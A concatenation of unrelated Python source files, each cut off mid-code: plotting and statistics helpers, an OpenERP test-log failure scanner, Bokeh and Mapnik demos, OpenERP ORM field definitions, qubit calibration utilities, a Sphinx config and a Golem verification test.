expected = np.array(expected_prob) * counts.sum()
return stats.chisquare(counts, expected)[1]
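# e.g. chisq([10, 20, 30], [1/6., 2/6., 3/6.]) -> 1.0 (observed == expected)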
def allchisq(to_plot, sum_classes, labels, classes):
num_classes = len(set(classes))
totals = []
for label in labels:
sum_ = 0
for class_num in xrange(num_classes):
sum_ += to_plot[class_num][label]
totals.append(sum_)
probs = []
sum_totals = sum(totals)
for i, t in enumerate(totals):
probs.append( t / sum_totals)
for class_num in xrange(num_classes):
counts = []
for label in labels:
counts.append(to_plot[class_num][label])
chisq(counts, probs)
def stacked_bars(labels, data_plots, out_fpath, label_translation, ref=True):
x_locations = [1, 2, 3, 4, 6, 7, 8, 9, 11, 12, 13, 14, 16, 17, 18, 19]
data_class = {}
data_label = {}
for data, _, class_num in data_plots:
best_idx = np.argsort(data)[::-1][:4]
best_cls = np.array(data)[best_idx]
best_lbl = np.array(labels)[best_idx]
data_class[label_translation[class_num]] = best_cls
data_label[label_translation[class_num]] = best_lbl
bar_data = []
bar_labels = []
for cls in sorted(data_class):
bar_data.extend(data_class[cls])
bar_labels.extend(data_label[cls])
colors = ['b', 'g', 'm', 'r', 'y', 'c', '#A617A1', '#2B5700', 'w',
'#FF7300', 'k'] * 3
colored={}
if ref:
to_use = set(REFERRER_ABBRV.values())
else:
to_use = set(CATEG_ABBRV.values())
for i, l in enumerate(to_use):
colored[l] = colors[i]
for x, y, l in zip(x_locations, bar_data, bar_labels):
c = colored[l]
plt.bar(left=x, height=y, color=c, width=1, alpha=0.5)
plt.text(x + .75, y, l, va='bottom', ha='center', rotation=45)
plt.xlim(xmin=0, xmax=21)
plt.xlabel('Cluster')
if ref:
plt.ylim(ymin=0, ymax=.31)
plt.ylabel('Fraction of Views in Cluster')
else:
plt.ylim(ymin=0, ymax=.4)
plt.ylabel('Fraction of Videos in Cluster')
    plt.xticks([3, 8, 13, 18], ['$C0$', '$C1$', '$C2$', '$C3$'])
plt.savefig(out_fpath)
@plac.annotations(features_fpath=plac.Annotation('Features file', type=str),
classes_fpath=plac.Annotation('Video classes file', type=str),
out_fpath=plac.Annotation('Plot file', type=str),
          trans_fpath=plac.Annotation('Translation of cluster num to label',
type=str),
col_to_use=plac.Annotation('Column number to use', type=int,
kind='option', abbrev='c'),
is_text_features=plac.Annotation('Indicates file type',
kind='flag', abbrev='t',
type=bool))
def main(features_fpath, classes_fpath, out_fpath,
trans_fpath, col_to_use=2, is_text_features=False):
initialize_matplotlib()
classes = np.loadtxt(classes_fpath)
if is_text_features:
to_plot, sum_classes, labels = \
load_text_file(features_fpath, col_to_use, classes)
ref=False
else:
to_plot, sum_classes, labels = \
load_svm_file(features_fpath, classes)
ref=True
trans = {}
with open(trans_fpath) as f:
for l in f:
spl = l.split()
trans[int(spl[0])] = int(spl[1])
data = generate_data_plot(to_plot, sum_classes, labels, classes)
stacked_bars(labels, data, out_fpath, trans, ref)
#allchisq(to_plot, sum_classes, labels, classes)
if __name__ == '__main__':
sys.exit(plac.call(main))
|
anybox/anybox.buildbot.odoo | anybox/buildbot/openerp/build_utils/analyze_oerp_tests.py | Python | agpl-3.0 | 1,459 | 0 | """Analyse the tests log file given as argument.
Print a report and return status code 1 if failures are detected
"""
import sys
import re
FAILURE_REGEXPS = {
'Failure in Python block': re.compile(r'WARNING:tests[.].*AssertionError'),
'Errors during x/yml tests': re.compile(r'ERROR:tests[.]'),
'Errors or failures during unittest2 tests': re.compile(
r'at least one error occurred in a test'),
'Errors loading addons': re.compile(r'ERROR.*openerp: Failed to load'),
'Critical logs': re.compile(r'CRITICAL'),
'Error init db': re.compile(r'Failed to initialize database'),
    'Tests failed to execute': re.compile(
r'openerp.modules.loading: Tests failed to execute'),
'At least one test failed when loading the modules': re.compile(
r'openerp.modules.loading: At least one test '
r'failed when loading the modules.'),
}
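# Illustrative lines each pattern is meant to catch (hypothetical examples,
# not verbatim OpenERP output):
#   'CRITICAL openerp.modules ...'              -> 'Critical logs'
#   'ERROR:tests.test_sale: assertion failed'   -> 'Errors during x/yml tests'
#   '... Failed to initialize database `test`'  -> 'Error init db'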
test_log = open(sys.argv[1], 'r')
failures = {}  # label -> list of matching lines
for line in test_log.readlines():
for label, regexp in FAILURE_REGEXPS.items():
        if regexp.search(line):
failures.setdefault(label, []).append(line)
if not failures:
print "No failure detected"
sys.exit(0)
total = 0
print 'FAILURES DETECTED'
print
for label, failed_lines in failures.items():
print label + ':'
for line in failed_lines:
print ' ' + line
print
total += len(failed_lines)
print "Total: %d failures " % total
sys.exit(1)
|
ericmjl/bokeh | examples/plotting/file/markers.py | Python | bsd-3-clause | 768 | 0.001302 | from numpy.random import random
from bokeh.models.markers import marker_types
from bokeh.plotting import figure, output_file, show
p = figure(title="Bokeh Markers", toolbar_location=None, output_backend="webgl")
p.grid.grid_line_color = None
p.background_fill_color = "#eeeeee"
p.axis.visible = False
p.y_range.flipped = True
N = 10
y = 1
for i, marker in enumerate(marker_types):
x = i % 4
if x == 0:
y += 4
p.scatter(random(N)+2*x, random(N)+y, marker=marker, size=14,
line_color="navy", fill_color="orange", alpha=0.5)
p.text(2*x+0.5, y+2.5, text=[marker],
text_color="firebrick", text_align="center", text_font_size="13px")
output_file("markers.html", title="markers.py example")
show(p) # open a browser
|
Ichag/openerp-server | openerp/osv/fields.py | Python | agpl-3.0 | 69,883 | 0.005023 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
""" Fields:
- simple
- relations (one2many, many2one, many2many)
- function
Fields Attributes:
* _classic_read: is a classic sql fields
* _type : field type
* _auto_join: for one2many and many2one fields, tells whether select
queries will join the relational table instead of replacing the
field condition by an equivalent-one based on a search.
* readonly
* required
* size
"""
import base64
import datetime as DT
import logging
import pytz
import re
import xmlrpclib
from psycopg2 import Binary
import openerp
import openerp.tools as tools
from openerp.tools.translate import _
from openerp.tools import float_round, float_repr
from openerp.tools import html_sanitize
import simplejson
from openerp import SUPERUSER_ID
_logger = logging.getLogger(__name__)
def _symbol_set(symb):
if symb is None or symb == False:
return None
elif isinstance(symb, unicode):
return symb.encode('utf-8')
return str(symb)
class _column(object):
""" Base of all fields, a database column
An instance of this object is a *description* of a database column. It will
not hold any data, but only provide the methods to manipulate data of an
ORM record or even prepare/update the database to hold such a field of data.
"""
_classic_read = True
_classic_write = True
_auto_join = False
_prefetch = True
_properties = False
_type = 'unknown'
_obj = None
_multi = False
_symbol_c = '%s'
_symbol_f = _symbol_set
_symbol_set = (_symbol_c, _symbol_f)
_symbol_get = None
# used to hide a certain field type in the list of field types
_deprecated = False
def __init__(self, string='unknown', required=False, readonly=False, domain=None, context=None, states=None, priority=0, change_default=False, size=None, ondelete=None, translate=False, select=False, manual=False, **args):
"""
The 'manual' keyword argument specifies if the field is a custom one.
It corresponds to the 'state' column in ir_model_fields.
"""
if domain is None:
domain = []
if context is None:
context = {}
self.states = states or {}
self.string = string
self.readonly = readonly
self.required = required
self.size = size
self.help = args.get('help', '')
self.priority = priority
self.change_default = change_default
self.ondelete = ondelete.lower() if ondelete else None # defaults to 'set null' in ORM
self.translate = translate
        self._domain = domain
self._context = context
self.write = False
self.read = False
self.select = select
self.manual = manual
self.selectable = True
self.group_operator = args.get('group_operator', False)
self.groups = False # CSV list of ext IDs of groups that can access this field
self.deprecated = False # Optional deprecation warning
for a in args:
setattr(self, a, args[a])
def restart(self):
pass
def set(self, cr, obj, id, name, value, user=None, context=None):
cr.execute('update '+obj._table+' set '+name+'='+self._symbol_set[0]+' where id=%s', (self._symbol_set[1](value), id))
def get(self, cr, obj, ids, name, user=None, offset=0, context=None, values=None):
raise Exception(_('undefined get method !'))
def search(self, cr, obj, args, name, value, offset=0, limit=None, uid=None, context=None):
ids = obj.search(cr, uid, args+self._domain+[(name, 'ilike', value)], offset, limit, context=context)
res = obj.read(cr, uid, ids, [name], context=context)
return [x[name] for x in res]
def as_display_name(self, cr, uid, obj, value, context=None):
"""Converts a field value to a suitable string representation for a record,
e.g. when this field is used as ``rec_name``.
:param obj: the ``BaseModel`` instance this column belongs to
:param value: a proper value as returned by :py:meth:`~openerp.orm.osv.BaseModel.read`
for this column
"""
# delegated to class method, so a column type A can delegate
# to a column type B.
return self._as_display_name(self, cr, uid, obj, value, context=None)
@classmethod
def _as_display_name(cls, field, cr, uid, obj, value, context=None):
# This needs to be a class method, in case a column type A as to delegate
# to a column type B.
return tools.ustr(value)
# ---------------------------------------------------------
# Simple fields
# ---------------------------------------------------------
class boolean(_column):
_type = 'boolean'
_symbol_c = '%s'
_symbol_f = lambda x: x and 'True' or 'False'
_symbol_set = (_symbol_c, _symbol_f)
def __init__(self, string='unknown', required=False, **args):
super(boolean, self).__init__(string=string, required=required, **args)
if required:
_logger.debug(
"required=True is deprecated: making a boolean field"
" `required` has no effect, as NULL values are "
"automatically turned into False. args: %r",args)
class integer(_column):
_type = 'integer'
_symbol_c = '%s'
_symbol_f = lambda x: int(x or 0)
_symbol_set = (_symbol_c, _symbol_f)
_symbol_get = lambda self,x: x or 0
def __init__(self, string='unknown', required=False, **args):
super(integer, self).__init__(string=string, required=required, **args)
class reference(_column):
_type = 'reference'
_classic_read = False # post-process to handle missing target
def __init__(self, string, selection, size=None, **args):
_column.__init__(self, string=string, size=size, selection=selection, **args)
def get(self, cr, obj, ids, name, uid=None, context=None, values=None):
result = {}
# copy initial values fetched previously.
for value in values:
result[value['id']] = value[name]
if value[name]:
model, res_id = value[name].split(',')
if not obj.pool[model].exists(cr, uid, [int(res_id)], context=context):
result[value['id']] = False
return result
@classmethod
def _as_display_name(cls, field, cr, uid, obj, value, context=None):
if value:
# reference fields have a 'model,id'-like value, that we need to convert
# to a real name
model_name, res_id = value.split(',')
if model_name in obj.pool and res_id:
model = obj.pool[model_name]
return model.name_get(cr, uid, [int(res_id)], context=context)[0][1]
return tools.ustr(value)
# takes a string (encoded in utf8) and returns a string (encoded in utf8)
def _symbol_set_char(self, symb):
#TODO:
# * we need to remove the "symb==False" from the next line BUT
# for now too many things rely on this broken behavior
# * the symb==None test should be common to al |
McDermott-Group/LabRAD | LabRAD/TestScripts/fpgaTest/pyle/pyle/dataking/squid.py | Python | gpl-2.0 | 19,393 | 0.009075 | from Queue import Empty
from multiprocessing import Process, Queue
import numpy as np
import matplotlib.pyplot as plt
from matplotlib import widgets
from scipy import interpolate
from labrad.units import Unit
V, mV, us, GHz, rad = [Unit(s) for s in ('V', 'mV', 'us', 'GHz', 'rad')]
from pyle.dataking import utilMultilevels as ml
from pyle.fitting import fitting
def adjust_s_scanning(qubit, data, qnd=False):
f, phase = data.T
traces = [{'x':f, 'y': phase, 'args':('b.',)}]
if qnd:
        params = [{'name': 'qnd_readout frequency', 'val': qubit['qnd_readout frequency'][GHz], 'range': (min(f),max(f)), 'axis': 'x', 'color': 'b'}]
else:
params = [{'name': 'readout frequency', 'val': qubit['readout frequency'][GHz], 'range': (min(f),max(f)), 'axis': 'x', 'color': 'b'}]
result = adjust(params, traces)
if result is not None:
if qnd:
qubit['qnd_readout frequency'] = result['qnd_readout frequency']*GHz
else:
qubit['readout frequency'] = result['readout frequency']*GHz
def adjust_phase(qubit, data):
fb, left, right = data.T
traces = [{'x': fb, 'y': left, 'args': ('b.',)},
{'x': fb, 'y': right, 'args': ('r.',)}]
params = [{'name':'adc adjusted phase', 'val': qubit['adc adjusted phase'][rad], 'range':(-np.pi, np.pi), 'axis':'y', 'color': 'b'}]
result = adjust(params, traces)
if result is not None:
qubit['adc adjusted phase'] = (-2 - result['adc adjusted phase'])*rad + qubit['adc adjusted phase']
if qubit['adc adjusted phase']>np.pi:
qubit['adc adjusted phase'] = qubit['adc adjusted phase']-2*np.pi
elif qubit['adc adjusted phase']<-np.pi:
qubit['adc adjusted phase'] = qubit['adc adjusted phase']+2*np.pi
def adjust_phase_arc(qubit, data):
fb, left, right = data.T
traces = [{'x': fb, 'y': left, 'args': ('b.',)},
{'x': fb, 'y': right, 'args': ('r.',)}]
params = [{'name': 'operate', 'val': qubit['biasOperate'][V], 'range': (-2.5,2.5), 'axis': 'x', 'color': 'b'},
{'name': 'readout', 'val': qubit['biasReadout'][V], 'range': (-2.5,2.5), 'axis': 'x', 'color': 'g'},
{'name': 'reset0', 'val': qubit['biasReset'][0][V], 'range': (-2.5,2.5), 'axis': 'x', 'color': 'r'},
{'name': 'reset1', 'val': qubit['biasReset'][1][V], 'range': (-2.5,2.5), 'axis': 'x', 'color': 'm'},
{'name': 'Phase', 'val': qubit['critical phase'][rad], 'range': (-np.pi,np.pi), 'axis': 'y', 'color': 'k'}]
result = adjust(params, traces)
if result is not None:
qubit['biasOperate'] = result['operate']*V
qubit['biasReadout'] = result['readout']*V
qubit['biasReset'] = [result['reset0']*V, result['reset1']*V] * 2
qubit['critical phase'] = result['Phase']*rad
def adjust_squid_steps(qubit, data):
fb, low, high = data.T
traces = [{'x': fb, 'y': low, 'args': ('b.',)},
{'x': fb, 'y': high, 'args': ('r.',)}]
params = [{'name': 'operate', 'val': qubit['biasOperate'][V], 'range': (-2.5,2.5), 'axis': 'x', 'color': 'b'},
{'name': 'readout', 'val': qubit['biasReadout'][V], 'range': (-2.5,2.5), 'axis': 'x', 'color': 'g'},
{'name': 'reset0', 'val': qubit['biasReset'][0][V], 'range': (-2.5,2.5), 'axis': 'x', 'color': 'r'},
{'name': 'reset1', 'val': qubit['biasReset'][1][V], 'range': (-2.5,2.5), 'axis': 'x', 'color': 'm'},
{'name': 'timing0', 'val': qubit['squidSwitchIntervals'][0][0][us], 'range': (0,60), 'axis': 'y', 'color': 'k'},
{'name': 'timing1', 'val': qubit['squidSwitchIntervals'][0][1][us], 'range': (0,60), 'axis': 'y', 'color': 'gray'},
{'name': 'Edge_left', 'val': qubit['squidEdges'][0][V], 'range': (-2.5,2.5), 'axis': 'x', 'color': 'g'},
{'name': 'Edge_right', 'val': qubit['squidEdges'][1][V], 'range': (-2.5,2.5), 'axis': 'x', 'color': 'r'}]
result = adjust(params, traces)
if result is not None:
qubit['biasOperate'] = result['operate']*V
qubit['biasReadout'] = result['readout']*V
qubit['biasReset'] = [result['reset0']*V, result['reset1']*V] * 2
qubit['squidSwitchIntervals'] = [(result['timing0']*us, result['timing1']*us)]
        qubit['squidEdges'] = [result['Edge_left']*V, result['Edge_right']*V]  # mark the edges of the two branches of the same color; converts voltage to Phi_0
def adjust_time(data):
t, probs = data[:,0], data[:,1:].T
traces = [{'x': t, 'y': prob, 'args': ('.-',)} for prob in probs]
params = [{'name': 't', 'val': (min(t)+max(t))/2, 'range': (min(t), max(t)), 'axis': 'x', 'color': 'b'}]
result = adjust(params, traces)
if result is not None:
return result['t']
def adjust_operate_bias(qubit, data):
fb, prob = data.T
traces = [{'x': fb, 'y': prob, 'args': ('b.-',)}]
params = [{'name': 'fb', 'val': qubit['biasOperate'][mV], 'range': (min(fb),max(fb)), 'axis': 'x', 'color': 'b'},
{'name': 'step', 'val': qubit['biasStepEdge'][mV], 'range': (min(fb),max(fb)), 'axis': 'x', 'color': 'r'}]
result = adjust(params, traces)
if result is not None:
qubit['biasOperate'] = result['fb']*mV
qubit['biasStepEdge'] = result['step']*mV
def adjust_scurve(qubit, data, states):
colors = ['b','g','r','c','m','y','k']
keynames=['measureAmp']+['measureAmp'+str(i) for i in list(np.arange(2,max(max(states)+2,2)))]
mpa, probs = data.T[0], data.T[1:]
traces = [{'x': mpa, 'y': prob, 'args': ('.-',)} for prob in probs]
params = [{'name': 'mpa'+str(state+1), 'val': float(qubit[keynames[state]]), 'range': (min(mpa),max(mpa)), 'axis': 'x', 'color': colors[state]} for state in states]
result = adjust(params, traces)
if result is not None:
for state in states:
qubit[keynames[state]] = result['mpa'+str(state+1)]
def adjust_visibility(qubit, data, states):
numstates=len(states)
mpas, probs, visis = data.T[0], data.T[1:numstates], data.T[numstates:]
colors = ['b','g','r','c','m','y','k']
keynames=['measureAmp']+['measureAmp'+str(i) for i in list(np.arange(2,max(max(states)+1,2)))]
    # We have to make sure that the mpa axis is monotonically increasing for scipy.interpolate.interp1d to work properly
    if mpas[0] > mpas[-1]: # If mpas runs negatively
        mpas = mpas[::-1] # Reverse its order
probs = probs[:,::-1] #and also reverse the order of the probabilities.
visis = visis[:,::-1] #and also reverse the order of the visibilities.
traces = [{'x':mpas, 'y':vis, 'args': ('.-',)} for vis in visis]+[{'x':mpas, 'y':prob, 'args': ('.-',)} for prob in probs]
params = [{'name':'mpa'+str(state), 'val': float(qubit[keynames[state-1]]), 'range': (min(mpas),max(mpas)), 'axis': 'x', 'color': colors[state-1]} for state in states[1:]]
result = adjust(params, traces)
if result is not None:
for state in states[1:]:
qubit[keynames[state-1]] = result['mpa'+str(state)]
def adjust_frequency(qubit, data, paramName=None):
if paramName is None:
paramName = 'f10'
f, prob = data.T
traces = [{'x': f, 'y': prob, 'args': ('b.-',)}]
params = [{'name': paramName, 'val': qubit[paramName][GHz], 'range': (min(f),max(f)), 'axis': 'x', 'color': 'b'}]
result = adjust(params, traces)
if result is not None:
qubit[paramName] = result[paramName]*GHz
def adjust_frequency_02(qubit, data):
f10 = qubit['f10'][GHz]
f21 = qubit['f21'][GHz]
f20_2ph = (f21 + f10) / 2
f, probs = data.T[0], data.T[1:]
traces = [{'x': f, 'y': prob, 'args': ('.-',)} for prob in probs]
params = [{'name': 'f10', 'val': f10, 'range': (min(f),max(f)), 'axis': 'x', 'color': 'b'},
{'name': 'f20_2ph', 'val': f20_2ph, 'range': (min(f),max(f)), 'axis': 'x', 'color': 'r'}]
result = adjust(params, traces)
if result is not None:
f10 = result['f10']
f20_2ph = result['f20_2ph']
f21 = 2*f20_2ph - f10
qubit['f10'] = f10*GHz
qubit['f21'] = f21*GHz
def adjust_fc(qubit, data):
f10 = qubit['f10'][G |
DataSploit/datasploit | emails/__init__.py | Python | gpl-3.0 | 380 | 0.005263 | from os.path import dirname, basename, isfile, abspath
import glob, importlib, sys
modules = glob.glob(dirname(__file__) + "/email_*.py")
__all__ = [basename(f)[:-3] for f in modules if isfile(f)]
sys.path.append(dirname(abspath(__file__)))
for m in __all__:
__import__(m, locals(), globals())
del m, f, dirname, basename, isfile, abspath, glob, importlib, sys, modules
|
googleapis/python-domains | docs/conf.py | Python | apache-2.0 | 12,378 | 0.000566 | # -*- coding: utf-8 -*-
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# google-cloud-domains documentation build configuration file
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import shlex
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath(".."))
# For plugins that can not read conf.py.
# See also: https://github.com/docascode/sphinx-docfx-yaml/issues/85
sys.path.insert(0, os.path.abspath("."))
__version__ = ""
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
needs_sphinx = "1.5.5"
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
"sphinx.ext.autodoc",
"sphinx.ext.autosummary",
"sphinx.ext.intersphinx",
"sphinx.ext.coverage",
"sphinx.ext.doctest",
"sphinx.ext.napoleon",
"sphinx.ext.todo",
"sphinx.ext.viewcode",
"recommonmark",
]
# autodoc/autosummary flags
autoclass_content = "both"
autodoc_default_options = {"members": True}
autosummary_generate = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ["_templates"]
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = [".rst", ".md"]
# The encoding of source files.
# source_encoding = 'utf-8-sig'
# The root toctree document.
root_doc = "index"
# General information about the project.
project = "google-cloud-domains"
copyright = "2019, Google"
author = "Google APIs"
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The full version, including alpha/beta/rc tags.
release = __version__
# The short X.Y version.
version = ".".join(release.split(".")[0:2])
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = [
"_build",
"**/.nox/**/*",
"samples/AUTHORING_GUIDE.md",
"samples/CONTRIBUTING.md",
"samples/snippets/README.rst",
]
# The reST default role (used for this markup: `text`) to use for all
# documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = "sphinx"
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
# keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = "alabaster"
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
html_theme_options = {
"description": "Google Cloud Client Libraries for google-cloud-domains",
"github_user": "googleapis",
"github_repo": "python-domains",
"github_banner": True,
"font_family": "'Roboto', Georgia, sans",
"head_font_family": "'Roboto', Georgia, serif",
"code_font_family": "'Roboto Mono', 'Consolas', monospace",
}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
# html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
# html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ["_static"]
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
# html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
# html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
# html_additional_pages = {}
# If false, no module index is generated.
# html_domain_indices = True
# If false, no index is generated.
# html_use_index = True
# If true, the index is split into individual pages for each letter.
# html_split_index = False
# If true, links to the reST sources are added to the pages.
# html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
# html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
# html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
# html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
# html_search |
h4ck3rm1k3/MapNickAutotools | demo/test/textspacing.py | Python | lgpl-2.1 | 2,565 | 0.008577 | # $Id: rundemo.py 577 2008-01-03 11:39:10Z artem $
#
# This file is part of Mapnik (c++ mapping toolkit)
# Copyright (C) 2005 Jean-Francois Doyon
#
# Mapnik is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
# Import everything. In this case this is safe, in more complex systems, you
# will want to be more selective.
try:
from mapnik import *
except:
print '\n\nThe mapnik library and python bindings must have been compiled and \
installed successfully before running this script.\n\n'
raise
m = Map(690,690,"+proj=latlong +ellps=WGS84")
m.background = Color(255,100,100,255)
road_style = Style()
#Road
road_rule = Rule()
road_stroke = Stroke(Color('white'), 12)
road_stroke.line_cap = line_cap.ROUND_CAP
road_stroke.line_join = line_join.ROUND_JOIN
#road_rule.filter = Filter("[CLASS] = 'STRAIGHT'")
road_rule.symbols.append(LineSymbolizer(road_stroke))
road_style.rules.append(road_rule);
#Road text
text_symbolizer = TextSymbolizer('NAME', 'DejaVu Sans Book', 10, Color('black'))
text_symbolizer.label_placement=label_placement.LINE_PLACEMENT
text_symbolizer.minimum_distance = 0
#text_symbolizer.max_char_angle_delta = 40
#text_symbolizer.force_odd_labels = 1
text_symbolizer.label_spacing = 80
text_symbolizer.label_position_tolerance = 5
text_symbolizer.avoid_edges = 0
text_symbolizer.halo_fill = Color('yellow')
text_symbolizer.halo_radius = 1
road_rule = Rule()
#road_rule.filter = Filter("[CLASS] = 'STRAIGHT'")
road_rule.symbols.append(text_symbolizer)
road_style.rules.append(road_rule)
road_layer = Layer('road')
road_layer.datasource = Shapefile(file='../data/test/textspacing')
m.append_style('road', road_style)
road_layer.styles.append('road')
m.layers.append(road_layer)
# Draw map
# Set the initial extent of the map.
m.zoom_to_box(Box2d(0,0,14,-14))
# Render
im = Image(m.width,m.height)
render(m, im)
# Save image to file
save_to_file('output.png', 'png',im) # true-colour RGBA
print "Done\n"
|
datagrok/python-misc | datagrok/django/middleware/__init__.py | Python | agpl-3.0 | 29 | 0 | """Middleware for Django."""
| |
Radagast-red/golem | tests/apps/core/task/test_core_verificator.py | Python | gpl-3.0 | 3,320 | 0.003614 | from mock import Mock
from golem.testutils import TempDirFixture
from golem.tools.assertlogs import LogTestCase
from apps.core.task.verificator import CoreVerificator, SubtaskVerificationState, logger
class TestCoreVerificator(TempDirFixture, LogTestCase):
def _fill_with_states(self, cv):
cv.ver_states["SUBTASK UNKNOWN"] = SubtaskVerificationState.UNKNOWN
cv.ver_states["SUBTASK WAITING"] = SubtaskVerificationState.WAITING
cv.ver_states["SUBTASK PARTIALLY VERIFIED"] = SubtaskVerificationState.PARTIALLY_VERIFIED
cv.ver_states["SUBTASK VERIFIED"] = SubtaskVerificationState.VERIFIED
cv.ver_states["SUBTASK WRONG_ANSWER"] = SubtaskVerificationState.WRONG_ANSWER
cv.ver_states["another_verified"] = SubtaskVerificationState.VERIFIED
def test_is_verified(self):
cv = CoreVerificator()
assert not cv.is_verified("SUBTASKWHENNOSUBTASKKNOWN")
self._fill_with_states(cv)
assert not cv.is_verified("COMPLETELY UNKNOWN")
assert not cv.is_verified("SUBTASK UNKNOWN")
assert not cv.is_verified("SUBTASK PARTIALLY VERIFIED")
assert not cv.is_verified("SUBTASK WRONG ANSWER")
assert cv.is_verified("SUBTASK VERIFIED")
assert cv.is_verified("another_verified")
def test_verification_state(self):
cv = CoreVerificator()
with self.assertLogs(logger, level="WARNING"):
assert cv.get_verification_state("SUBTASKWHENNOSUBTASKKNOWN") == \
SubtaskVerificationState.UNKNOWN
self._fill_with_states(cv)
with self.assertLogs(logger, level="WARNING"):
assert cv.get_verification_state("COMPLETELY UNKNOWN") == \
SubtaskVerificationState.UNKNOWN
        with self.assertNoLogs(logger, level="WARNING"):
assert cv.get_verification_state("SUBTASK UNKNOWN") == \
SubtaskVerificationState.UNKNOWN
assert cv.get_verification_state("SUBTASK PARTIALLY VERIFIED") == \
SubtaskVerificationState.PARTIALLY_VERIFIED
            assert cv.get_verification_state("SUBTASK WRONG_ANSWER") == \
SubtaskVerificationState.WRONG_ANSWER
assert cv.get_verification_state("another_verified") == \
SubtaskVerificationState.VERIFIED
assert cv.get_verification_state("SUBTASK VERIFIED") == \
SubtaskVerificationState.VERIFIED
def test_check_files(self):
cv = CoreVerificator()
cv._check_files("SUBTASK X", dict(), [], Mock())
assert cv.get_verification_state("SUBTASK X") == SubtaskVerificationState.WRONG_ANSWER
files = self.additional_dir_content([3])
cv._check_files("SUBTASK X2", dict(), files, Mock())
assert cv.get_verification_state("SUBTASK X2") == SubtaskVerificationState.VERIFIED
files = self.additional_dir_content([3])
